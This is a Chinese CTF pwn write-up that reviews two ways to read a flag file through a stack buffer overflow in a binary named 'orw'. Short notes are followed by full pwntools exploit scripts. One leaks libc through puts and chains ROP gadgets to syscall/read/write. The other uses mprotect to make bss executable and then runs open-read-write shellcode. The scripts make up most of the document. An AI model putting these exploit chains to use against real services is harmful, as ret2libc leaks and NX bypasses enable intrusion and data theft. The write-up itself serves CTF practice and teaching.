栈上orw关于使用libc以及mprotect+shellcode的用法
- 题目详情类似于之前写的那个orw–libc,这里主要是回顾一下复习一下(太久没打了)
- 这一波写的脚本比上次写的清楚多了(毕竟这次是回顾,上次是新学)
- 第一种,用libc的syscall函数来调用open、然后用read+write读出。
- 文件本身没有的pop_rdx啥的可以从libc文件离读取偏移,再用基地址加就可以了
- 这里需要注意的一点是要用read把flag这个名字读进去,这里读到了已知的固定地址bss段上。
from pwn import*
#context(log_level='debug',arch='i386',os='linux')
context(log_level='debug',arch='amd64',os='linux')
p=process('./orw')
puts_plt=0x400700
puts_got=0x601028
back_addr=0x4009AF
pop_rdi = 0x0000000000400aa3
bss_addr = 0x601500
payload = b'A'*(0x40+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(back_addr)
p.send(payload)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
success(hex(puts_addr))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = puts_addr - libc.sym['puts']
read_addr = libc_base +libc.sym['read']
write_addr = libc_base+libc.sym['write']
pop_rdx= libc_base + 0x0000000000001b96
pop_rsi = libc_base + 0x0000000000023a6a
syscall_addr = libc_base +libc.sym['syscall']
payload = b"A"*(0x40+8)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss_addr)+p64(pop_rdx)+p64(8)+p64(read_addr)+p64(back_addr)
payload=payload.ljust(0x100,b'\x00')
#gdb.attach(p)
#pause(1)
p.send(payload)
p.send(b'./flag\x00\x00')
payload = b"A"*(0x48)+p64(pop_rdi)+p64(2)+p64(pop_rsi)+p64(bss_addr)+p64(pop_rdx)+p64(0)+p64(syscall_addr)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(bss_addr)+p64(pop_rdx)+p64(0x20)+p64(read_addr)
payload+=p64(pop_rdi)+p64(1)+p64(write_addr)
#gdb.attach(p)
#pause(1)
p.send(payload)
p.interactive()
- 第二种,用mprotect+shellcode
from pwn import*
#context(log_level='debug',arch='i386',os='linux')
context(log_level='debug',arch='amd64',os='linux')
p=process('./orw')
puts_plt=0x400700
puts_got=0x601028
back_addr=0x4009AF
pop_rdi = 0x0000000000400aa3
bss_addr=0x601000
payload = b'A'*(0x40+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(back_addr)
p.send(payload)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
success(hex(puts_addr))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = puts_addr - libc.sym['puts']
pop_rdx= libc_base + 0x0000000000001b96
pop_rsi = libc_base + 0x0000000000023a6a
mprotect_addr = libc_base + libc.sym['mprotect']
read_addr = libc_base + libc.sym['read']
payload = b"A"*(0x48)+p64(pop_rdi)+p64(bss_addr)+p64(pop_rsi)+p64(0x1000)+p64(pop_rdx)+p64(7)+p64(mprotect_addr)+p64(back_addr)
#gdb.attach(p)
#pause(1)
p.send(payload)
payload = b"A"*(0x48)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss_addr+0x500)+p64(pop_rdx)+p64(0x200)+p64(read_addr)+p64(bss_addr+0x500)
payload = payload.ljust(0x100,b'\x00')
#gdb.attach(p)
#pause(1)
p.send(payload)
shellcode = shellcraft.open('flag')
shellcode +=shellcraft.read('3','rsp',0x20)
shellcode +=shellcraft.write('1','rsp',0x20)
payload = asm(shellcode)
p.send(payload)
p.interactive()
有什么疑问的可以直接提出。